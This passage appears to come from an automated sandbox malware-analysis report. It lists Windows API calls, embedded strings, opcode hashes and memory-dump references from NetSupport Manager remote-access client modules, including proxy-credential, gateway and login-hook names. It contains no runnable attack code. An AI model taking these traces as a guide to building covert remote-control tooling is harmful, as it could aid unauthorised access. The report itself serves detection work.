                                                                                                              • Associated: 00000001.00000002.4180435058.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Close
                                                                                                              • String ID: Add [%s]%s=%s$Chg [%s]%s=%s$Client$Del [%s]%s=%s$Info. Lockup averted for AD policy changes$Info. Policy changed - re-initui$Info. Policy changed - reload transports...$IsA()$NSA.LIC$NSM.LIC$RoomSpec$TracePolicyChange$Warning. Can't calc AD policy changes$_debug$client$client.$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h
                                                                                                              • API String ID: 3535843008-2062829784
                                                                                                              • Opcode ID: d57b2f7d390a2548c1a404b3922d606782abb187a8979f341b8c48ed45959037
                                                                                                              • Instruction ID: 6553b1da6d6d14651d2a1fffef45e08f8fb4271012d2e4188a9b1e9169dedbc2
                                                                                                              • Opcode Fuzzy Hash: d57b2f7d390a2548c1a404b3922d606782abb187a8979f341b8c48ed45959037
                                                                                                              • Instruction Fuzzy Hash: E4420778E002999FEB21CBA0CD90FEEF7766F95B08F1401D8D50967681EB727A84CB51
                                                                                                              APIs
                                                                                                                • Part of subcall function 1110F420: _malloc.LIBCMT ref: 1110F439
                                                                                                                • Part of subcall function 1110F420: wsprintfA.USER32 ref: 1110F454
                                                                                                                • Part of subcall function 1110F420: _memset.LIBCMT ref: 1110F477
                                                                                                              • InitializeCriticalSection.KERNEL32(0000000C,?,00000000), ref: 11074AE5
                                                                                                              • InitializeCriticalSection.KERNEL32(00000024,?,00000000), ref: 11074AEB
                                                                                                              • InitializeCriticalSection.KERNEL32(0000003C,?,00000000), ref: 11074AF1
                                                                                                              • InitializeCriticalSection.KERNEL32(0000DB1C,?,00000000), ref: 11074AFA
                                                                                                              • InitializeCriticalSection.KERNEL32(00000054,?,00000000), ref: 11074B00
                                                                                                              • InitializeCriticalSection.KERNEL32(0000006C,?,00000000), ref: 11074B06
                                                                                                              • _strncpy.LIBCMT ref: 11074B68
                                                                                                              • ExpandEnvironmentStringsA.KERNEL32(?,?,00000100,?,?,?,?,?,?,00000000), ref: 11074BCF
                                                                                                              • CreateThread.KERNEL32(00000000,00004000,11070C60,00000000,00000000,?), ref: 11074C6C
                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,00000000), ref: 11074C73
                                                                                                              • SetTimer.USER32(00000000,00000000,000000FA,11063680), ref: 11074CB7
                                                                                                              • std::exception::exception.LIBCMT ref: 11074D68
                                                                                                              • __CxxThrowException@8.LIBCMT ref: 11074D83
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.4180214210.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                              • Associated: 00000001.00000002.4180187919.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180349116.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180389264.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180412265.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: CriticalInitializeSection$CloseCreateEnvironmentException@8ExpandHandleStringsThreadThrowTimer_malloc_memset_strncpystd::exception::exceptionwsprintf
                                                                                                              • String ID: ..\ctl32\Connect.cpp$DefaultUsername$General$Password$RememberPassword$destroy_queue == NULL
                                                                                                              • API String ID: 703120326-1497550179
                                                                                                              • Opcode ID: 7c8943816f378bc6fd854347406ceee894156ad89ebdfca9a8c75f1e5f5be459
                                                                                                              • Instruction ID: 2d3153b5a6430d98d64e81d2a1e668bfe4de0d121a1dff3557e595bbadcf65c6
                                                                                                              • Opcode Fuzzy Hash: 7c8943816f378bc6fd854347406ceee894156ad89ebdfca9a8c75f1e5f5be459
                                                                                                              • Instruction Fuzzy Hash: 79B1A4B5A00359AFD710CF64CD84FDAF7F4BB48708F0085A9E65997281EBB0B944CB65
                                                                                                              APIs
                                                                                                                • Part of subcall function 1110F420: _malloc.LIBCMT ref: 1110F439
                                                                                                                • Part of subcall function 1110F420: wsprintfA.USER32 ref: 1110F454
                                                                                                                • Part of subcall function 1110F420: _memset.LIBCMT ref: 1110F477
                                                                                                              • OpenEventA.KERNEL32(00000002,00000000,nsm_gina_sas,00000009), ref: 11108E0A
                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 11108E19
                                                                                                              • GetSystemDirectoryA.KERNEL32(?,000000F7), ref: 11108E2B
                                                                                                              • LoadLibraryA.KERNEL32(?), ref: 11108E61
                                                                                                              • GetProcAddress.KERNEL32(?,GrabKM), ref: 11108E8E
                                                                                                              • GetProcAddress.KERNEL32(?,LoggedOn), ref: 11108EA6
                                                                                                              • FreeLibrary.KERNEL32(?), ref: 11108ECB
                                                                                                                • Part of subcall function 1110F2B0: CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00000000,76EEC3F0,00000000,?,11110245,1110FDE0,00000001,00000000), ref: 1110F2C7
                                                                                                                • Part of subcall function 1110F2B0: CreateThread.KERNEL32(00000000,11110245,00000001,00000000,00000000,0000000C), ref: 1110F2EA
                                                                                                                • Part of subcall function 1110F2B0: WaitForSingleObject.KERNEL32(?,000000FF,?,11110245,1110FDE0,00000001,00000000,?,?,?,?,?,11031040), ref: 1110F317
                                                                                                                • Part of subcall function 1110F2B0: CloseHandle.KERNEL32(?,?,11110245,1110FDE0,00000001,00000000,?,?,?,?,?,11031040), ref: 1110F321
                                                                                                              • GetStockObject.GDI32(0000000D), ref: 11108EDF
                                                                                                              • GetObjectA.GDI32(00000000,0000003C,?), ref: 11108EEF
                                                                                                              • InitializeCriticalSection.KERNEL32(0000003C), ref: 11108F0B
                                                                                                              • InitializeCriticalSection.KERNEL32(111F060C), ref: 11108F16
                                                                                                                • Part of subcall function 11107290: LoadLibraryA.KERNEL32(Wtsapi32.dll,00000000,00000000,11189A56,000000FF), ref: 11107363
                                                                                                                • Part of subcall function 11107290: LoadLibraryA.KERNEL32(Advapi32.dll), ref: 111073B2
                                                                                                              • CloseHandle.KERNEL32(00000000,Function_00102C50,00000001,00000000), ref: 11108F59
                                                                                                                • Part of subcall function 1109E9E0: GetCurrentProcess.KERNEL32(00020008,00000000,?,?,110F7D14,00000001,111417B8,_debug,TraceCopyData,00000000,00000000,?,?,00000000,00000000), ref: 1109EA01
                                                                                                                • Part of subcall function 1109E9E0: OpenProcessToken.ADVAPI32(00000000,?,?,110F7D14,00000001,111417B8,_debug,TraceCopyData,00000000,00000000,?,?,00000000,00000000), ref: 1109EA08
                                                                                                                • Part of subcall function 1109E9E0: CloseHandle.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 1109EA27
                                                                                                              • CloseHandle.KERNEL32(00000000,Function_00102C50,00000001,00000000), ref: 11108FAA
                                                                                                              • CloseHandle.KERNEL32(00000000,Function_00102C50,00000001,00000000), ref: 11108FFF
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.4180214210.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                              • Associated: 00000001.00000002.4180187919.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180349116.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180389264.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180412265.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: CloseHandle$Library$LoadObject$AddressCreateCriticalEventInitializeOpenProcProcessSection$CurrentDirectoryFreeSingleStockSystemThreadTokenWait_malloc_memsetwsprintf
                                                                                                              • String ID: GrabKM$LPT1$LoggedOn$\pcigina$nsm_gina_sas
                                                                                                              • API String ID: 3930710499-403456261
                                                                                                              • Opcode ID: 1bb63630e84e06d7a5d883501c08249baca6a639cf459e52fb6089e18ee58e4a
                                                                                                              • Instruction ID: 229803012459fbbe5cfd3a30b02a894d1af5bad55287ed163187595495ff030c
                                                                                                              • Opcode Fuzzy Hash: 1bb63630e84e06d7a5d883501c08249baca6a639cf459e52fb6089e18ee58e4a
                                                                                                              • Instruction Fuzzy Hash: DC81AFB4E0435AEFEB55DFB48C89B9AFBE9AB48308F00457DE569D7280E7309944CB11
                                                                                                              APIs
                                                                                                                • Part of subcall function 111450A0: GetVersionExA.KERNEL32(111F0EF0,75BF8400), ref: 111450D0
                                                                                                                • Part of subcall function 111450A0: RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00000001,?), ref: 1114510F
                                                                                                                • Part of subcall function 111450A0: _memset.LIBCMT ref: 1114512D
                                                                                                                • Part of subcall function 111450A0: _strncpy.LIBCMT ref: 111451FA
                                                                                                              • PostMessageA.USER32(0002049E,000006CF,00000007,00000000), ref: 11138E0F
                                                                                                                • Part of subcall function 1105DD10: __wcstoi64.LIBCMT ref: 1105DD4D
                                                                                                              • SetWindowTextA.USER32(0002049E,00000000), ref: 11138EB7
                                                                                                              • IsWindowVisible.USER32(0002049E), ref: 11138F7C
                                                                                                              • GetForegroundWindow.USER32(?,?,?,?,?,?,?,?,00000000), ref: 11138F9C
                                                                                                              • IsWindowVisible.USER32(0002049E), ref: 11138FAA
                                                                                                              • SetForegroundWindow.USER32(00000000), ref: 11138FD8
                                                                                                              • EnableWindow.USER32(0002049E,00000001), ref: 11138FE7
                                                                                                              • IsWindowVisible.USER32(0002049E), ref: 11139038
                                                                                                              • IsWindowVisible.USER32(0002049E), ref: 11139045
                                                                                                              • EnableWindow.USER32(0002049E,00000000), ref: 11139059
                                                                                                              • EnableWindow.USER32(0002049E,00000000), ref: 11138FBF
                                                                                                                • Part of subcall function 11131210: ShowWindow.USER32(0002049E,00000000,?,11139062,00000007,?,?,?,?,?,00000000), ref: 11131234
                                                                                                              • EnableWindow.USER32(0002049E,00000001), ref: 1113906D
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.4180214210.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                              • Associated: 00000001.00000002.4180187919.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180349116.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180389264.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180412265.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Window$EnableVisible$Foreground$MessageOpenPostShowTextVersion__wcstoi64_memset_strncpy
                                                                                                              • String ID: Client$ConnectedText$HideWhenIdle$LockedText$ShowUIOnConnect$ViewedText
                                                                                                              • API String ID: 3453649892-3803836183
                                                                                                              • Opcode ID: 391fd03a16533da79435ce5bee1303fc2e717428408a6b437c143b59ca9afbf1
                                                                                                              • Instruction ID: ae8ec3c714d324370739ddb1cab1952d607c59122f5be0bb7ac7fd02d25128b2
                                                                                                              • Opcode Fuzzy Hash: 391fd03a16533da79435ce5bee1303fc2e717428408a6b437c143b59ca9afbf1
                                                                                                              • Instruction Fuzzy Hash: 86C12A75A1122A9BEB11DFF4CD80B6EF769ABC072DF140138EA159B28CEB75E804C751
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.4180719718.000000006C791000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C790000, based on PE: true
                                                                                                              • Associated: 00000001.00000002.4180699601.000000006C790000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180753976.000000006C7D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180775211.000000006C7D9000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180794419.000000006C7DA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180794419.000000006C7DE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180831579.000000006C7E0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_6c790000_bild.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: wsprintf
                                                                                                              • String ID: %s:%s$*GatewayAddress$*PINServer$*UseWebProxy$*WebProxy$:%d$Gateway$Gateway_UseWebProxy$Gateway_WebProxy$P$PinProxy$ProxyCred$ProxyPassword$ProxyUsername$UsePinProxy$client247$r<zl
                                                                                                              • API String ID: 2111968516-1949704795
                                                                                                              • Opcode ID: 6f0c2d048930c5bd3285af59e224a25e809f979a493b6ff9e3afeb46b3a46000
                                                                                                              • Instruction ID: 106c1c314106e6111c4d05189bd8c90120017db3e75be5d990c2777e2f78b26a
                                                                                                              • Opcode Fuzzy Hash: 6f0c2d048930c5bd3285af59e224a25e809f979a493b6ff9e3afeb46b3a46000
                                                                                                              • Instruction Fuzzy Hash: 5522B8B2A00358AFDB24CF94CD84EEAB77DBB4A304F0486E9E54967A40D6315F89CF51
                                                                                                              APIs
                                                                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000102,NSM.LIC,00000009), ref: 110281F1
                                                                                                                • Part of subcall function 11081B40: _strrchr.LIBCMT ref: 11081B4E
                                                                                                              • wsprintfA.USER32 ref: 11028214
                                                                                                              • WaitForSingleObject.KERNEL32(?,000000FF), ref: 11028259
                                                                                                              • GetExitCodeProcess.KERNEL32(?,?), ref: 1102826D
                                                                                                              • wsprintfA.USER32 ref: 11028291
                                                                                                              • CloseHandle.KERNEL32(?), ref: 110282A7
                                                                                                              • CloseHandle.KERNEL32(?), ref: 110282B0
                                                                                                              • LoadLibraryExA.KERNEL32(?,00000000,00000002,?,?,?,?,?,NSM.LIC,00000009), ref: 11028311
                                                                                                              • GetModuleHandleA.KERNEL32(00000000,00000000,?,?,?,?,?,NSM.LIC,00000009), ref: 11028325
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.4180214210.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                              • Associated: 00000001.00000002.4180187919.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180349116.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180389264.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180412265.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Handle$CloseModulewsprintf$CodeExitFileLibraryLoadNameObjectProcessSingleWait_strrchr
                                                                                                              • String ID: "$Locales\%d\$NSM.LIC$SetClientResLang called, gPlatform %x$Setting resource langid=%d$\GetUserLang.exe"$pcicl32_res.dll
                                                                                                              • API String ID: 512045693-419896573
                                                                                                              • Opcode ID: be2a4d539e06a764388bcf1fddbdd407ba59922a3a30c161602edf8e7ebb4000
                                                                                                              • Instruction ID: 7a246749baaa4a6e23861a3fd22e5cd13303056935123195fcb9bb693944541c
                                                                                                              • Opcode Fuzzy Hash: be2a4d539e06a764388bcf1fddbdd407ba59922a3a30c161602edf8e7ebb4000
                                                                                                              • Instruction Fuzzy Hash: B841D678E04229ABD714CF65CCD5FEAB7B9EB44709F0081A5F95897280DA71AE44CBA0
                                                                                                              APIs
                                                                                                              • LoadLibraryA.KERNEL32(PCIINV.DLL,E43C2CA5,02A876F0,02A876E0,?,00000000,1118276C,000000FF,?,11031942,02A876F0,00000000,?,?,?), ref: 11085E45
                                                                                                                • Part of subcall function 1110F420: _malloc.LIBCMT ref: 1110F439
                                                                                                                • Part of subcall function 1110F420: wsprintfA.USER32 ref: 1110F454
                                                                                                                • Part of subcall function 1110F420: _memset.LIBCMT ref: 1110F477
                                                                                                                • Part of subcall function 1110F520: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,76EEC3F0,?,1111022D,00000000,00000001,?,?,?,?,?,11031040), ref: 1110F53E
                                                                                                              • GetProcAddress.KERNEL32(00000000,GetInventory), ref: 11085E6B
                                                                                                              • GetProcAddress.KERNEL32(00000000,Cancel), ref: 11085E7F
                                                                                                              • GetProcAddress.KERNEL32(00000000,GetInventoryEx), ref: 11085E93
                                                                                                              • wsprintfA.USER32 ref: 11085F1B
                                                                                                              • wsprintfA.USER32 ref: 11085F32
                                                                                                              • wsprintfA.USER32 ref: 11085F49
                                                                                                              • CloseHandle.KERNEL32(00000000,11085C70,00000001,00000000), ref: 1108609A
                                                                                                                • Part of subcall function 11085A80: CloseHandle.KERNEL32(?,74DEF550,?,?,110860C0,?,11031942,02A876F0,00000000,?,?,?), ref: 11085A98
                                                                                                                • Part of subcall function 11085A80: CloseHandle.KERNEL32(?,74DEF550,?,?,110860C0,?,11031942,02A876F0,00000000,?,?,?), ref: 11085AAB
                                                                                                                • Part of subcall function 11085A80: CloseHandle.KERNEL32(?,74DEF550,?,?,110860C0,?,11031942,02A876F0,00000000,?,?,?), ref: 11085ABE
                                                                                                                • Part of subcall function 11085A80: FreeLibrary.KERNEL32(00000000,74DEF550,?,?,110860C0,?,11031942,02A876F0,00000000,?,?,?), ref: 11085AD1
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.4180214210.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                              • Associated: 00000001.00000002.4180187919.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180349116.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180389264.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180412265.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: CloseHandlewsprintf$AddressProc$Library$CreateEventFreeLoad_malloc_memset
                                                                                                              • String ID: %s_HF.%s$%s_HW.%s$%s_SW.%s$Cancel$GetInventory$GetInventoryEx$PCIINV.DLL
                                                                                                              • API String ID: 4263811268-2492245516
                                                                                                              • Opcode ID: f5aef0daa14bc6ea66726438fc532167d4c8a127bd90decb683372eff0d319c6
                                                                                                              • Instruction ID: c264ff3baa83c9e34b1ea5f373b83d9ca187d225ad452563e08076ac2ec7b834
                                                                                                              • Opcode Fuzzy Hash: f5aef0daa14bc6ea66726438fc532167d4c8a127bd90decb683372eff0d319c6
                                                                                                              • Instruction Fuzzy Hash: 40718175E0874AABEB14CF75CC46BDBFBE4AB48304F10452AE956D7280EB71A500CB95
                                                                                                              APIs
                                                                                                              • OpenMutexA.KERNEL32(001F0001,00000000,PCIMutex), ref: 110305F3
                                                                                                              • CreateMutexA.KERNEL32(00000000,00000000,PCIMutex), ref: 1103060A
                                                                                                              • GetProcAddress.KERNEL32(?,SetProcessDPIAware), ref: 110306AC
                                                                                                              • SetLastError.KERNEL32(00000078), ref: 110306C2
                                                                                                              • WaitForSingleObject.KERNEL32(?,000001F4), ref: 110306FC
                                                                                                              • CloseHandle.KERNEL32(?), ref: 11030709
                                                                                                              • FreeLibrary.KERNEL32(?), ref: 11030714
                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 1103071B
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.4180214210.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                              • Associated: 00000001.00000002.4180187919.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180349116.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180389264.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180412265.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: CloseHandleMutex$AddressCreateErrorFreeLastLibraryObjectOpenProcSingleWait
                                                                                                              • String ID: /247$PCIMutex$SOFTWARE\Policies\NetSupport\Client\standard$SetProcessDPIAware$_debug\trace$_debug\tracefile$istaUI
                                                                                                              • API String ID: 2061479752-1320826866
                                                                                                              • Opcode ID: 344344da4f24c17c6c11c64113ed1526ed618b4690303f5ba055bceda43c688d
                                                                                                              • Instruction ID: 4511418fabb8e143c6e2e60e2068ec6a59f08b67eb8208c825473cc9362a61df
                                                                                                              • Opcode Fuzzy Hash: 344344da4f24c17c6c11c64113ed1526ed618b4690303f5ba055bceda43c688d
                                                                                                              • Instruction Fuzzy Hash: 72613774E1635AAFEB10DFB09C44B9EB7B4AF8470DF1000A9D919A71C5EF70AA44CB51
                                                                                                              APIs
                                                                                                                • Part of subcall function 1110F340: SetEvent.KERNEL32(00000000,?,1102C44F), ref: 1110F364
                                                                                                              • WaitForSingleObject.KERNEL32(?,000000FF), ref: 1102C455
                                                                                                              • GetTickCount.KERNEL32 ref: 1102C47A
                                                                                                                • Part of subcall function 110D0710: __strdup.LIBCMT ref: 110D072A
                                                                                                              • GetTickCount.KERNEL32 ref: 1102C574
                                                                                                                • Part of subcall function 110D1370: wvsprintfA.USER32(?,?,1102C511), ref: 110D139B
                                                                                                                • Part of subcall function 110D07C0: _free.LIBCMT ref: 110D07ED
                                                                                                              • WaitForSingleObject.KERNEL32(?,000000FF), ref: 1102C66C
                                                                                                              • CloseHandle.KERNEL32(?), ref: 1102C688
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.4180214210.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                              • Associated: 00000001.00000002.4180187919.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
